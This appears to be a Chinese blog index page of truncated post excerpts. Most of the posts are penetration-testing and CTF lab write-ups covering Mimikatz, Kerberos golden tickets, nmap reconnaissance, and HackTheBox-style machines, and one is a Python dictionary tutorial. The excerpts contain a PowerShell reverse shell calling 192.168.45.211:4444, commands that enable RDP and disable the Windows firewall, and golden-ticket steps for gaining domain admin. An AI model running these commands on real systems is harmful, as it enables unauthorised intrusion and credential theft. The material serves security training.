1. Mimikatz介绍作者：Benjamin DelpyBeniamin Delpy最初创建 Mimikatz是为了向微软证明其身份验证协议容易受到攻击然而，这个工具在20之后仍然被广泛用于网络安全行业这个工具也是世界上最好的...

Kali使用pwsh编译$Text = '$client = New-Object System.Net.Sockets.TCPClient('192.168.45.211',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.R...

Kerberos 进行身份验证过程的第一步是发送 ASREQ。根据此请求，域控制器可以验证身份验证是否成功。如果是，域控制器将回复包含会话密钥和 TGT 的 AS-REP。此步骤通常也称为 Kerberos 预身份验...

任务从dollarcorp的DC拿到secrets使用krbtgt账户的secrets 制作一个黄金票据使用黄金票据(再一次)从一个机器拿到 doamin admin 权限 使用管理员权限运行终端C:\AD\Tools\ArgSplit.bat asktgtse...

实验环境攻击者 Kali 192.168.192.128受害者 IP 192.168.192.183 Linux  1. 信息收集在/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt 中的cgi-bin的后面加一个/ gobutser扫...

1. 字典的定义字典的定义，同样使用引，不过存储的元素是一个个的：键值对，如下语法：#定义字典字面量{key:value,key:value,......key:value}#定义字典变量my_dict = {key:value,key:value,......

实验环境攻击者 Kali 192.168.0.103受害者 Healthcare IP未知攻击者和受害者在同一网段  1. 信息收集nmap -sn 192.168.0.0/24受害者IP为192.168.0.104 收集受害者服务详情nmap -sV -A 192.16...

前期准备发现我是administrator上传mimikatz.exe 允许RDPreg add 'HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server' /v 'fDenyTSConnections' /t REG_DWORD /d 0 /f 关闭防火墙netsh ...

简介point 20SnookumsDifficulty INTERMEDIATErated by community INTERMEDIATE 实验环境攻击者 Kali 192.168.45.206受害者 IP 192.168.241.58  Linux 1. 信息收集收集受害者服务详情nmap -s...

简介nodeDifficulty Medium 实验环境攻击者 Kali 10.10.16.16受害者 IP 10.10.10.58  Linux 1. 信息收集收集受害者服务详情nmap -sC -sV -p- 10.10.10.58 --min-rate 10000 -oA tartar22和30...